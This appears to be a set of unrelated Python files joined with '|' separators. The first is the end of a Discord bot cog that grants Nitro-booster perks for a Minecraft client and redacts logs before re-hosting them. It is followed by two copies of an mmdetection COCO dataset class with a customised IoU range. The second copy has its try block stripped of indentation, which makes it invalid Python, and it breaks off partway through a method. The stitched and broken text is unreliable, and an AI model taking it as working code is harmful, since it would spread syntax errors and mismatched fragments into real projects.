                    'description': 'Nitro Booster dots for the Hyperium Client!',
                    'files': {
                        'boosters.json': {
                            'content': json.dumps(current, indent=2)
                        }
                    }
                }
                route = Route(
                    'PATCH',
                    f'/gists/{self.gist}'
                )
                try:
                    gist = await self.bot.http.github.request(
                        route,
                        json=payload,
                        headers=self.gistheaders
                    )
                except Exception:
                    self.bot.logger.error(f'$REDFailed to patch booster gist for $CYAN{mcuuid}')
                    return
                general = self.guild.get_channel(411620457754787841)
                await general.send(f'{after.mention} Your nitro perks have been removed. Boost the server to get them back :)')

    async def haste(self, content, fallback: bool = False):
        """Upload content to a haste server and return an embed-suppressed link.

        Falls back to h.inv.wtf when hst.sh doesn't answer 200.
        """
        url = 'hst.sh'
        if fallback:
            url = 'h.inv.wtf'
        # fix: close the session when done; the original leaked a
        # ClientSession on every call.
        async with aiohttp.ClientSession() as session:
            async with session.post(f'https://{url}/documents', data=content) as r:
                if r.status != 200 and not fallback:
                    return await self.haste(content, fallback=True)
                j = await r.json()
        return f'<https://{url}/' + j['key'] + '>'

    @commands.Cog.listener()
    async def on_message(self, message):
        """Inline pastebin links, then scrub and re-host anything that looks
        like a Minecraft log (attachment or long plain message)."""
        if self.bot.dev:
            return
        if not message.guild:
            # fix: DMs have no guild; the checks below dereference
            # message.guild.id and would raise AttributeError.
            return
        pastebin = re.findall(self.pastebinre, message.content, re.MULTILINE)
        if pastebin:
            # fix: one closed session for all paste fetches (was leaked).
            async with aiohttp.ClientSession() as session:
                for p in pastebin:
                    async with session.get(f'https://pastebin.com/raw/{p}') as r:
                        message.content = re.sub(self.pastebinre, (await r.text()), message.content, 0, re.MULTILINE)
        for attach in message.attachments:
            if not re.match(self.logregex, attach.filename) and not attach.filename == 'message.txt':
                return
            try:
                txt = await attach.read()
            except Exception as e:
                self.bot.logger.error(f'$REDFailed to read log sent by $CYAN{message.author}', exc_info=e)
                # fix: the original fell through here and hit a NameError on
                # the undefined `txt` below.
                return
            try:
                txt = txt.decode('utf-8')
            except Exception:
                try:
                    txt = txt.decode('ISO-8859-1')
                except Exception as e:
                    self.bot.logger.error(f'$REDFailed to decode log sent by $CYAN{message.author}', exc_info=e)
                    return  # give up, leave the file there
            # Redact PII and secrets before re-hosting.
            txt = re.sub(self.emailre, '[removed email]', txt, 0, re.MULTILINE)
            txt = re.sub(self.urlre, '[removed url]', txt, 0, re.MULTILINE)
            txt = re.sub(self.homere, 'USER.HOME', txt, 0, re.MULTILINE)
            for line in txt.split('\n'):
                if re.findall(self.secrets, line, re.MULTILINE):
                    txt = txt.replace(line, '[line removed to protect sensitive info]')
            if any(t in txt for t in self.logtext) and message.guild.id == 411619823445999637:
                try:
                    url = await self.haste(txt)
                except Exception as e:
                    self.bot.logger.error(f'$REDFailed to upload log to hastebin', exc_info=e)
                    return
                await message.delete()
                return await message.channel.send(f'{message.author} uploaded a log, {message.content}\n{url}')
        if not message.attachments and len(message.content) > 350:
            txt = message.content
            txt = re.sub(self.emailre, '[removed email]', txt, 0, re.MULTILINE)
            txt = re.sub(self.urlre, '[removed url]', txt, 0, re.MULTILINE)
            txt = re.sub(self.homere, 'USER.HOME', txt, 0, re.MULTILINE)
            for line in txt.split('\n'):
                if re.findall(self.secrets, line, re.MULTILINE):
                    txt = txt.replace(line, '[line removed to protect sensitive info]')
            if any(t in message.content for t in self.logtext) and message.guild.id == 411619823445999637:
                try:
                    url = await self.haste(txt)
                except Exception as e:
                    self.bot.logger.error(f'$REDFailed to upload log to hastebin', exc_info=e)
                    return
                await message.delete()
                return await message.channel.send(f'{message.author} sent a log, {url}')

    @commands.command(description='Adds perks for Nitro Boosters')
    async def nitroperks(self, ctx, ign: str = None):
        """Grant booster perks to the invoking member.

        Records the member's Minecraft UUID in the boosters gist and enables
        their perks through the modcore API, rebinding an existing entry if
        one is present.
        """
        if self.nitro not in ctx.author.roles and self.testrole not in ctx.author.roles:
            return await ctx.send('no')
        if not ign:
            return await ctx.error('You must provide your Minecraft name!')
        mid = await self.bot.get_cog('Hypixel Commands').name_to_uuid(ign)
        if not mid:
            return await ctx.error('No UUID found!')
        progress = await ctx.send('Give me a moment.')
        route = Route(
            'GET',
            f'/gists/{self.gist}'
        )
        try:
            gist = await self.bot.http.github.request(
                route,
                headers=self.gistheaders
            )
        except Exception:
            return await progress.edit(content='<:xmark:674359427830382603> Something went wrong when getting the list of boosters')
        text = gist.get('files', {}).get('boosters.json', {}).get('content', ['error'])
        current = json.loads(text)
        if 'error' in current:
            return await progress.edit(content='<:xmark:674359427830382603> Something went wrong when getting the list of boosters')
        try:
            # Existing entry: disable perks for the old UUID, then rebind.
            user = next(i for i in current if i["id"] == str(ctx.author.id))
            route = Route(
                'GET',
                f'/nitro/{user["uuid"]}/false'
            )
            try:
                await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
            except Exception as e:
                # fix: Message.edit takes keyword-only `content`
                return await progress.edit(content=f'<:xmark:674359427830382603> Failed to remove perks from previous user, {user["ign"]}')
            current.remove(user)
            user['uuid'] = str(uuid.UUID(mid))
            user['ign'] = ign
        except Exception:
            # No existing entry (or the lookup failed): create a fresh one.
            user = {
                "uuid": str(uuid.UUID(mid)),
                "ign": ign,
                "id": str(ctx.author.id),
                "color": "LIGHT_PURPLE"
            }
        current.append(user)
        route = Route(
            'GET',
            f'/nitro/{user["uuid"]}/true'
        )
        try:
            await self.bot.http.modcore.request(route, headers=self.modcoreheaders)
        except Exception as e:
            # fix: Logger.warn is the deprecated alias of Logger.warning
            self.bot.logger.warning(f'$YELLOWFailed to give perks on modcore', exc_info=e)
            await ctx.error(f'Failed to give perks on modcore.')
        payload = {
            'description': 'Nitro Booster dots for the Hyperium Client!',
            'files': {
                'boosters.json': {
                    'content': json.dumps(current, indent=2)
                }
            }
        }
        route = Route(
            'PATCH',
            f'/gists/{self.gist}'
        )
        try:
            gist = await self.bot.http.github.request(
                route,
                json=payload,
                headers=self.gistheaders
            )
        except Exception:
            return await ctx.error('Failed to give you the perks in Hyperium')
        return await progress.edit(content='<:check:674359197378281472> Successfully gave you the perks!')
def setup(bot):
    """Extension entry point: register the Sk1er cog with the bot."""
    bot.add_cog(Sk1er(bot))
    bot.logger.info(f'$GREENLoaded cog for discord.gg/sk1er!')
|
import itertools
import logging
import os.path as osp
import tempfile
import mmcv
import numpy as np
from mmcv.utils import print_log
from pycocotools.coco import COCO
#from pycocotools.cocoeval import COCOeval
from mmdet.datasets.fast_eval_api import COCOeval_opt as COCOeval
from terminaltables import AsciiTable
from mmdet.core import eval_recalls
from .builder import DATASETS
from .custom import CustomDataset
# Enforce the open-mmlab fork of pycocotools (mmpycocotools, versioned 12.x).
try:
    import pycocotools
    # fix: compare numerically — plain string comparison is lexicographic,
    # so e.g. '2.0.2' >= '12.0.2' would be True and wrongly pass the check.
    _pct_version = tuple(
        int(part) for part in pycocotools.__version__.split('.')[:3]
        if part.isdigit())
    assert _pct_version >= (12, 0, 2)
except AssertionError:
    raise AssertionError('Incompatible version of pycocotools is installed. '
                         'Run pip uninstall pycocotools first. Then run pip '
                         'install mmpycocotools to install open-mmlab forked '
                         'pycocotools.')
@DATASETS.register_module()
class CocoDataset(CustomDataset):
    """COCO-style detection dataset.

    Uses a deliberately extended evaluation protocol: the default IoU
    thresholds start at 0.10 (not the COCO-standard 0.50) and the stats
    mapping exposes extra 'mAP_25'/'map_10' entries accordingly.
    """

    CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
               'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
               'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
               'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
               'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
               'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
               'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
               'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
               'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
               'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
               'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
               'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
               'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',
               'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush')

    def load_annotations(self, ann_file):
        """Load annotation from COCO style annotation file.

        Args:
            ann_file (str): Path of annotation file.

        Returns:
            list[dict]: Annotation info from COCO api.
        """
        self.coco = COCO(ann_file)
        self.cat_ids = self.coco.get_cat_ids(cat_names=self.CLASSES)
        self.cat2label = {cat_id: i for i, cat_id in enumerate(self.cat_ids)}
        self.img_ids = self.coco.get_img_ids()
        data_infos = []
        for i in self.img_ids:
            info = self.coco.load_imgs([i])[0]
            info['filename'] = info['file_name']
            data_infos.append(info)
        return data_infos

    def get_ann_info(self, idx):
        """Get COCO annotation by index.

        Args:
            idx (int): Index of data.

        Returns:
            dict: Annotation info of specified index.
        """
        img_id = self.data_infos[idx]['id']
        ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
        ann_info = self.coco.load_anns(ann_ids)
        return self._parse_ann_info(self.data_infos[idx], ann_info)

    def get_cat_ids(self, idx):
        """Get COCO category ids by index.

        Args:
            idx (int): Index of data.

        Returns:
            list[int]: All categories in the image of specified index.
        """
        img_id = self.data_infos[idx]['id']
        ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
        ann_info = self.coco.load_anns(ann_ids)
        return [ann['category_id'] for ann in ann_info]

    def _filter_imgs(self, min_size=32):
        """Filter images too small or without ground truths."""
        valid_inds = []
        # obtain images that contain annotation
        ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
        # obtain images that contain annotations of the required categories
        ids_in_cat = set()
        for i, class_id in enumerate(self.cat_ids):
            ids_in_cat |= set(self.coco.cat_img_map[class_id])
        # merge the image id sets of the two conditions and use the merged set
        # to filter out images if self.filter_empty_gt=True
        ids_in_cat &= ids_with_ann
        valid_img_ids = []
        for i, img_info in enumerate(self.data_infos):
            img_id = self.img_ids[i]
            if self.filter_empty_gt and img_id not in ids_in_cat:
                continue
            if min(img_info['width'], img_info['height']) >= min_size:
                valid_inds.append(i)
                valid_img_ids.append(img_id)
        # keep img_ids aligned with the filtered data_infos
        self.img_ids = valid_img_ids
        return valid_inds

    def _parse_ann_info(self, img_info, ann_info):
        """Parse bbox and mask annotation.

        Args:
            ann_info (list[dict]): Annotation info of an image.
            with_mask (bool): Whether to parse mask annotations.

        Returns:
            dict: A dict containing the following keys: bboxes, bboxes_ignore,\
                labels, masks, seg_map. "masks" are raw annotations and not \
                decoded into binary masks.
        """
        gt_bboxes = []
        gt_labels = []
        gt_bboxes_ignore = []
        gt_masks_ann = []
        for i, ann in enumerate(ann_info):
            if ann.get('ignore', False):
                continue
            x1, y1, w, h = ann['bbox']
            # drop boxes with no overlap with the image
            inter_w = max(0, min(x1 + w, img_info['width']) - max(x1, 0))
            inter_h = max(0, min(y1 + h, img_info['height']) - max(y1, 0))
            if inter_w * inter_h == 0:
                continue
            if ann['area'] <= 0 or w < 1 or h < 1:
                continue
            if ann['category_id'] not in self.cat_ids:
                continue
            bbox = [x1, y1, x1 + w, y1 + h]
            if ann.get('iscrowd', False):
                # crowd regions are ignored rather than treated as GT
                gt_bboxes_ignore.append(bbox)
            else:
                gt_bboxes.append(bbox)
                gt_labels.append(self.cat2label[ann['category_id']])
                gt_masks_ann.append(ann.get('segmentation', None))
        if gt_bboxes:
            gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
            gt_labels = np.array(gt_labels, dtype=np.int64)
        else:
            gt_bboxes = np.zeros((0, 4), dtype=np.float32)
            gt_labels = np.array([], dtype=np.int64)
        if gt_bboxes_ignore:
            gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
        else:
            gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
        # NOTE(review): replaces the first 'jpg' substring anywhere in the
        # name, not just the extension — confirm filenames can't contain
        # 'jpg' mid-name before relying on seg_map.
        seg_map = img_info['filename'].replace('jpg', 'png')
        ann = dict(
            bboxes=gt_bboxes,
            labels=gt_labels,
            bboxes_ignore=gt_bboxes_ignore,
            masks=gt_masks_ann,
            seg_map=seg_map)
        return ann

    def xyxy2xywh(self, bbox):
        """Convert ``xyxy`` style bounding boxes to ``xywh`` style for COCO
        evaluation.

        Args:
            bbox (numpy.ndarray): The bounding boxes, shape (4, ), in
                ``xyxy`` order.

        Returns:
            list[float]: The converted bounding boxes, in ``xywh`` order.
        """
        _bbox = bbox.tolist()
        return [
            _bbox[0],
            _bbox[1],
            _bbox[2] - _bbox[0],
            _bbox[3] - _bbox[1],
        ]

    def _proposal2json(self, results):
        """Convert proposal results to COCO json style."""
        json_results = []
        for idx in range(len(self)):
            img_id = self.img_ids[idx]
            bboxes = results[idx]
            for i in range(bboxes.shape[0]):
                data = dict()
                data['image_id'] = img_id
                data['bbox'] = self.xyxy2xywh(bboxes[i])
                data['score'] = float(bboxes[i][4])
                data['category_id'] = 1
                json_results.append(data)
        return json_results

    def _det2json(self, results):
        """Convert detection results to COCO json style."""
        json_results = []
        for idx in range(len(self)):
            img_id = self.img_ids[idx]
            result = results[idx]
            for label in range(len(result)):
                bboxes = result[label]
                for i in range(bboxes.shape[0]):
                    data = dict()
                    data['image_id'] = img_id
                    data['bbox'] = self.xyxy2xywh(bboxes[i])
                    data['score'] = float(bboxes[i][4])
                    data['category_id'] = self.cat_ids[label]
                    json_results.append(data)
        return json_results

    def _segm2json(self, results):
        """Convert instance segmentation results to COCO json style."""
        bbox_json_results = []
        segm_json_results = []
        for idx in range(len(self)):
            img_id = self.img_ids[idx]
            det, seg = results[idx]
            for label in range(len(det)):
                # bbox results
                bboxes = det[label]
                for i in range(bboxes.shape[0]):
                    data = dict()
                    data['image_id'] = img_id
                    data['bbox'] = self.xyxy2xywh(bboxes[i])
                    data['score'] = float(bboxes[i][4])
                    data['category_id'] = self.cat_ids[label]
                    bbox_json_results.append(data)
                # segm results
                # some detectors use different scores for bbox and mask
                if isinstance(seg, tuple):
                    segms = seg[0][label]
                    mask_score = seg[1][label]
                else:
                    segms = seg[label]
                    mask_score = [bbox[4] for bbox in bboxes]
                for i in range(bboxes.shape[0]):
                    data = dict()
                    data['image_id'] = img_id
                    data['bbox'] = self.xyxy2xywh(bboxes[i])
                    data['score'] = float(mask_score[i])
                    data['category_id'] = self.cat_ids[label]
                    if isinstance(segms[i]['counts'], bytes):
                        # RLE counts must be str for json serialization
                        segms[i]['counts'] = segms[i]['counts'].decode()
                    data['segmentation'] = segms[i]
                    segm_json_results.append(data)
        return bbox_json_results, segm_json_results

    def results2json(self, results, outfile_prefix):
        """Dump the detection results to a COCO style json file.

        There are 3 types of results: proposals, bbox predictions, mask
        predictions, and they have different data types. This method will
        automatically recognize the type, and dump them to json files.

        Args:
            results (list[list | tuple | ndarray]): Testing results of the
                dataset.
            outfile_prefix (str): The filename prefix of the json files. If the
                prefix is "somepath/xxx", the json files will be named
                "somepath/xxx.bbox.json", "somepath/xxx.segm.json",
                "somepath/xxx.proposal.json".

        Returns:
            dict[str: str]: Possible keys are "bbox", "segm", "proposal", and \
                values are corresponding filenames.
        """
        result_files = dict()
        if isinstance(results[0], list):
            json_results = self._det2json(results)
            result_files['bbox'] = f'{outfile_prefix}.bbox.json'
            result_files['proposal'] = f'{outfile_prefix}.bbox.json'
            mmcv.dump(json_results, result_files['bbox'])
        elif isinstance(results[0], tuple):
            json_results = self._segm2json(results)
            result_files['bbox'] = f'{outfile_prefix}.bbox.json'
            result_files['proposal'] = f'{outfile_prefix}.bbox.json'
            result_files['segm'] = f'{outfile_prefix}.segm.json'
            mmcv.dump(json_results[0], result_files['bbox'])
            mmcv.dump(json_results[1], result_files['segm'])
        elif isinstance(results[0], np.ndarray):
            json_results = self._proposal2json(results)
            result_files['proposal'] = f'{outfile_prefix}.proposal.json'
            mmcv.dump(json_results, result_files['proposal'])
        else:
            raise TypeError('invalid type of results')
        return result_files

    def fast_eval_recall(self, results, proposal_nums, iou_thrs, logger=None):
        """Evaluate proposal recall directly from GT boxes (no COCOeval)."""
        gt_bboxes = []
        for i in range(len(self.img_ids)):
            ann_ids = self.coco.get_ann_ids(img_ids=self.img_ids[i])
            ann_info = self.coco.load_anns(ann_ids)
            if len(ann_info) == 0:
                gt_bboxes.append(np.zeros((0, 4)))
                continue
            bboxes = []
            for ann in ann_info:
                if ann.get('ignore', False) or ann['iscrowd']:
                    continue
                x1, y1, w, h = ann['bbox']
                bboxes.append([x1, y1, x1 + w, y1 + h])
            bboxes = np.array(bboxes, dtype=np.float32)
            if bboxes.shape[0] == 0:
                bboxes = np.zeros((0, 4))
            gt_bboxes.append(bboxes)
        recalls = eval_recalls(
            gt_bboxes, results, proposal_nums, iou_thrs, logger=logger)
        # average over IoU thresholds -> one AR value per proposal budget
        ar = recalls.mean(axis=1)
        return ar

    def format_results(self, results, jsonfile_prefix=None, **kwargs):
        """Format the results to json (standard format for COCO evaluation).

        Args:
            results (list[tuple | numpy.ndarray]): Testing results of the
                dataset.
            jsonfile_prefix (str | None): The prefix of json files. It includes
                the file path and the prefix of filename, e.g., "a/b/prefix".
                If not specified, a temp file will be created. Default: None.

        Returns:
            tuple: (result_files, tmp_dir), result_files is a dict containing \
                the json filepaths, tmp_dir is the temporal directory created \
                for saving json files when jsonfile_prefix is not specified.
        """
        assert isinstance(results, list), 'results must be a list'
        assert len(results) == len(self), (
            'The length of results is not equal to the dataset len: {} != {}'.
            format(len(results), len(self)))
        if jsonfile_prefix is None:
            tmp_dir = tempfile.TemporaryDirectory()
            jsonfile_prefix = osp.join(tmp_dir.name, 'results')
        else:
            tmp_dir = None
        result_files = self.results2json(results, jsonfile_prefix)
        return result_files, tmp_dir

    def evaluate(self,
                 results,
                 metric='bbox',
                 logger=None,
                 jsonfile_prefix=None,
                 classwise=False,
                 proposal_nums=(100, 300, 1000),
                 iou_thrs=None,
                 metric_items=None):
        """Evaluation in COCO protocol.

        Args:
            results (list[list | tuple]): Testing results of the dataset.
            metric (str | list[str]): Metrics to be evaluated. Options are
                'bbox', 'segm', 'proposal', 'proposal_fast'.
            logger (logging.Logger | str | None): Logger used for printing
                related information during evaluation. Default: None.
            jsonfile_prefix (str | None): The prefix of json files. It includes
                the file path and the prefix of filename, e.g., "a/b/prefix".
                If not specified, a temp file will be created. Default: None.
            classwise (bool): Whether to evaluating the AP for each class.
            proposal_nums (Sequence[int]): Proposal number used for evaluating
                recalls, such as recall@100, recall@1000.
                Default: (100, 300, 1000).
            iou_thrs (Sequence[float], optional): IoU threshold used for
                evaluating recalls/mAPs. If set to a list, the average of all
                IoUs will also be computed. If not specified, [0.10, 0.15, ...,
                0.90, 0.95] will be used (custom extension of the COCO range).
                Default: None.
            metric_items (list[str] | str, optional): Metric items that will
                be returned. If not specified, ``['AR@100', 'AR@300',
                'AR@1000', 'AR_s@1000', 'AR_m@1000', 'AR_l@1000' ]`` will be
                used when ``metric=='proposal'``, ``['mAP', 'mAP_50', 'mAP_75',
                'mAP_25', 'map_10', 'mAP_s', 'mAP_m', 'mAP_l']`` will be used
                when ``metric=='bbox' or metric=='segm'``.

        Returns:
            dict[str, float]: COCO style evaluation metric.
        """
        metrics = metric if isinstance(metric, list) else [metric]
        allowed_metrics = ['bbox', 'segm', 'proposal', 'proposal_fast']
        for metric in metrics:
            if metric not in allowed_metrics:
                raise KeyError(f'metric {metric} is not supported')
        if iou_thrs is None:
            # Custom protocol: 0.10:0.05:0.95 (18 thresholds) instead of the
            # COCO default 0.50:0.95 — this is what enables the extra
            # 'mAP_25'/'map_10' stats slots below.
            iou_thrs = np.linspace(
                .10, 0.95, int(np.round((0.95 - .10) / .05)) + 1, endpoint=True)
        if metric_items is not None:
            if not isinstance(metric_items, list):
                metric_items = [metric_items]
        result_files, tmp_dir = self.format_results(results, jsonfile_prefix)
        eval_results = {}
        cocoGt = self.coco
        for metric in metrics:
            msg = f'Evaluating {metric}...'
            if logger is None:
                msg = '\n' + msg
            print_log(msg, logger=logger)
            if metric == 'proposal_fast':
                ar = self.fast_eval_recall(
                    results, proposal_nums, iou_thrs, logger='silent')
                log_msg = []
                for i, num in enumerate(proposal_nums):
                    eval_results[f'AR@{num}'] = ar[i]
                    log_msg.append(f'\nAR@{num}\t{ar[i]:.4f}')
                log_msg = ''.join(log_msg)
                print_log(log_msg, logger=logger)
                continue
            if metric not in result_files:
                raise KeyError(f'{metric} is not in results')
            try:
                cocoDt = cocoGt.loadRes(result_files[metric])
            except IndexError:
                print_log(
                    'The testing results of the whole dataset is empty.',
                    logger=logger,
                    level=logging.ERROR)
                break
            iou_type = 'bbox' if metric == 'proposal' else metric
            cocoEval = COCOeval(cocoGt, cocoDt, iou_type)
            cocoEval.params.catIds = self.cat_ids
            cocoEval.params.imgIds = self.img_ids
            cocoEval.params.maxDets = list(proposal_nums)
            cocoEval.params.iouThrs = iou_thrs
            # mapping of cocoEval.stats indices for the extended protocol;
            # the lower-case 'map_10' key is kept as-is because callers pass
            # these strings via `metric_items`.
            coco_metric_names = {
                'mAP': 0,
                'mAP_50': 1,
                'mAP_75': 2,
                'mAP_25': 3,
                'map_10': 4,
                'mAP_s': 5,
                'mAP_m': 6,
                'mAP_l': 7,
                'AR@100': 8,
                'AR@300': 9,
                'AR@1000': 10,
                'AR_s@1000': 11,
                'AR_m@1000': 12,
                'AR_l@1000': 13
            }
            if metric_items is not None:
                for metric_item in metric_items:
                    if metric_item not in coco_metric_names:
                        raise KeyError(
                            f'metric item {metric_item} is not supported')
            if metric == 'proposal':
                cocoEval.params.useCats = 0
                cocoEval.evaluate()
                cocoEval.accumulate()
                cocoEval.summarize()
                if metric_items is None:
                    metric_items = [
                        'AR@100', 'AR@300', 'AR@1000', 'AR_s@1000',
                        'AR_m@1000', 'AR_l@1000'
                    ]
                for item in metric_items:
                    val = float(
                        f'{cocoEval.stats[coco_metric_names[item]]:.3f}')
                    eval_results[item] = val
            else:
                cocoEval.evaluate()
                cocoEval.accumulate()
                cocoEval.summarize()
                if classwise:  # Compute per-category AP
                    # Compute per-category AP
                    # from https://github.com/facebookresearch/detectron2/
                    precisions = cocoEval.eval['precision']
                    # precision: (iou, recall, cls, area range, max dets)
                    assert len(self.cat_ids) == precisions.shape[2]
                    results_per_category = []
                    for idx, catId in enumerate(self.cat_ids):
                        # area range index 0: all area ranges
                        # max dets index -1: typically 100 per image
                        nm = self.coco.loadCats(catId)[0]
                        precision = precisions[:, :, idx, 0, -1]
                        precision = precision[precision > -1]
                        if precision.size:
                            ap = np.mean(precision)
                        else:
                            ap = float('nan')
                        # fix: inner quotes must differ from the f-string's
                        # own quotes (SyntaxError before Python 3.12)
                        results_per_category.append(
                            (f'{nm["name"]}', f'{float(ap):0.3f}'))
                    num_columns = min(6, len(results_per_category) * 2)
                    results_flatten = list(
                        itertools.chain(*results_per_category))
                    headers = ['category', 'AP'] * (num_columns // 2)
                    results_2d = itertools.zip_longest(*[
                        results_flatten[i::num_columns]
                        for i in range(num_columns)
                    ])
                    table_data = [headers]
                    table_data += [result for result in results_2d]
                    table = AsciiTable(table_data)
                    print_log('\n' + table.table, logger=logger)
                if metric_items is None:
                    metric_items = [
                        'mAP', 'mAP_50', 'mAP_75', 'mAP_25', 'map_10', 'mAP_s', 'mAP_m', 'mAP_l'
                    ]
                for metric_item in metric_items:
                    key = f'{metric}_{metric_item}'
                    val = float(
                        f'{cocoEval.stats[coco_metric_names[metric_item]]:.3f}'
                    )
                    eval_results[key] = val
                ap = cocoEval.stats[:6]
                eval_results[f'{metric}_mAP_copypaste'] = (
                    f'{ap[0]:.3f} {ap[1]:.3f} {ap[2]:.3f} {ap[3]:.3f} '
                    f'{ap[4]:.3f} {ap[5]:.3f}')
        if tmp_dir is not None:
            tmp_dir.cleanup()
        return eval_results
| import itertools
import logging
import os.path as osp
import tempfile
import mmcv
import numpy as np
from mmcv.utils import print_log
from pycocotools.coco import COCO
#from pycocotools.cocoeval import COCOeval
from mmdet.datasets.fast_eval_api import COCOeval_opt as COCOeval
from terminaltables import AsciiTable
from mmdet.core import eval_recalls
from .builder import DATASETS
from .custom import CustomDataset
try:
import pycocotools
assert pycocotools.__version__ >= '12.0.2'
except AssertionError:
raise AssertionError('Incompatible version of pycocotools is installed. '
'Run pip uninstall pycocotools first. Then run pip '
'install mmpycocotools to install open-mmlab forked '
'pycocotools.')
@DATASETS.register_module()
class CocoDataset(CustomDataset):
    """COCO-style detection / instance-segmentation dataset.

    NOTE(review): this is a customized variant. ``evaluate`` builds IoU
    thresholds starting at 0.10 (standard COCO starts at 0.50) and maps
    extra ``mAP_25`` / ``map_10`` entries in ``coco_metric_names``,
    relying on the forked ``COCOeval_opt`` (imported above) to produce a
    matching ``stats`` layout — confirm against that fork before editing.
    """

    # The 80 COCO object categories, in canonical COCO category order.
    CLASSES = ('person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus',
               'train', 'truck', 'boat', 'traffic light', 'fire hydrant',
               'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog',
               'horse', 'sheep', 'cow', 'elephant', 'bear', 'zebra', 'giraffe',
               'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
               'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat',
               'baseball glove', 'skateboard', 'surfboard', 'tennis racket',
               'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl',
               'banana', 'apple', 'sandwich', 'orange', 'broccoli', 'carrot',
               'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
               'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop',
               'mouse', 'remote', 'keyboard', 'cell phone', 'microwave',
               'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock',
               'vase', 'scissors', 'teddy bear', 'hair drier', 'toothbrush')

    def load_annotations(self, ann_file):
        """Load annotation from COCO style annotation file.

        Args:
            ann_file (str): Path of annotation file.

        Returns:
            list[dict]: Annotation info from COCO api.
        """
        self.coco = COCO(ann_file)
        # Only categories listed in CLASSES participate; map COCO category
        # ids to contiguous 0-based labels.
        self.cat_ids = self.coco.get_cat_ids(cat_names=self.CLASSES)
        self.cat2label = {cat_id: i for i, cat_id in enumerate(self.cat_ids)}
        self.img_ids = self.coco.get_img_ids()
        data_infos = []
        for i in self.img_ids:
            info = self.coco.load_imgs([i])[0]
            # mmdet pipelines expect a 'filename' key.
            info['filename'] = info['file_name']
            data_infos.append(info)
        return data_infos

    def get_ann_info(self, idx):
        """Get COCO annotation by index.

        Args:
            idx (int): Index of data.

        Returns:
            dict: Annotation info of specified index.
        """
        img_id = self.data_infos[idx]['id']
        ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
        ann_info = self.coco.load_anns(ann_ids)
        return self._parse_ann_info(self.data_infos[idx], ann_info)

    def get_cat_ids(self, idx):
        """Get COCO category ids by index.

        Args:
            idx (int): Index of data.

        Returns:
            list[int]: All categories in the image of specified index.
        """
        img_id = self.data_infos[idx]['id']
        ann_ids = self.coco.get_ann_ids(img_ids=[img_id])
        ann_info = self.coco.load_anns(ann_ids)
        return [ann['category_id'] for ann in ann_info]

    def _filter_imgs(self, min_size=32):
        """Filter images too small or without ground truths."""
        valid_inds = []
        # obtain images that contain annotation
        ids_with_ann = set(_['image_id'] for _ in self.coco.anns.values())
        # obtain images that contain annotations of the required categories
        ids_in_cat = set()
        for i, class_id in enumerate(self.cat_ids):
            ids_in_cat |= set(self.coco.cat_img_map[class_id])
        # merge the image id sets of the two conditions and use the merged set
        # to filter out images if self.filter_empty_gt=True
        ids_in_cat &= ids_with_ann
        valid_img_ids = []
        for i, img_info in enumerate(self.data_infos):
            img_id = self.img_ids[i]
            if self.filter_empty_gt and img_id not in ids_in_cat:
                continue
            if min(img_info['width'], img_info['height']) >= min_size:
                valid_inds.append(i)
                valid_img_ids.append(img_id)
        # keep self.img_ids aligned with the filtered data_infos
        self.img_ids = valid_img_ids
        return valid_inds

    def _parse_ann_info(self, img_info, ann_info):
        """Parse bbox and mask annotation.

        Args:
            ann_info (list[dict]): Annotation info of an image.
            with_mask (bool): Whether to parse mask annotations.

        Returns:
            dict: A dict containing the following keys: bboxes, bboxes_ignore,\
                labels, masks, seg_map. "masks" are raw annotations and not \
                decoded into binary masks.
        """
        gt_bboxes = []
        gt_labels = []
        gt_bboxes_ignore = []
        gt_masks_ann = []
        for i, ann in enumerate(ann_info):
            if ann.get('ignore', False):
                continue
            x1, y1, w, h = ann['bbox']
            # clip the xywh box against the image; skip boxes entirely
            # outside the image or degenerate (zero intersection area)
            inter_w = max(0, min(x1 + w, img_info['width']) - max(x1, 0))
            inter_h = max(0, min(y1 + h, img_info['height']) - max(y1, 0))
            if inter_w * inter_h == 0:
                continue
            if ann['area'] <= 0 or w < 1 or h < 1:
                continue
            if ann['category_id'] not in self.cat_ids:
                continue
            bbox = [x1, y1, x1 + w, y1 + h]
            # crowd regions are excluded from matching (ignore list)
            if ann.get('iscrowd', False):
                gt_bboxes_ignore.append(bbox)
            else:
                gt_bboxes.append(bbox)
                gt_labels.append(self.cat2label[ann['category_id']])
                gt_masks_ann.append(ann.get('segmentation', None))
        if gt_bboxes:
            gt_bboxes = np.array(gt_bboxes, dtype=np.float32)
            gt_labels = np.array(gt_labels, dtype=np.int64)
        else:
            gt_bboxes = np.zeros((0, 4), dtype=np.float32)
            gt_labels = np.array([], dtype=np.int64)
        if gt_bboxes_ignore:
            gt_bboxes_ignore = np.array(gt_bboxes_ignore, dtype=np.float32)
        else:
            gt_bboxes_ignore = np.zeros((0, 4), dtype=np.float32)
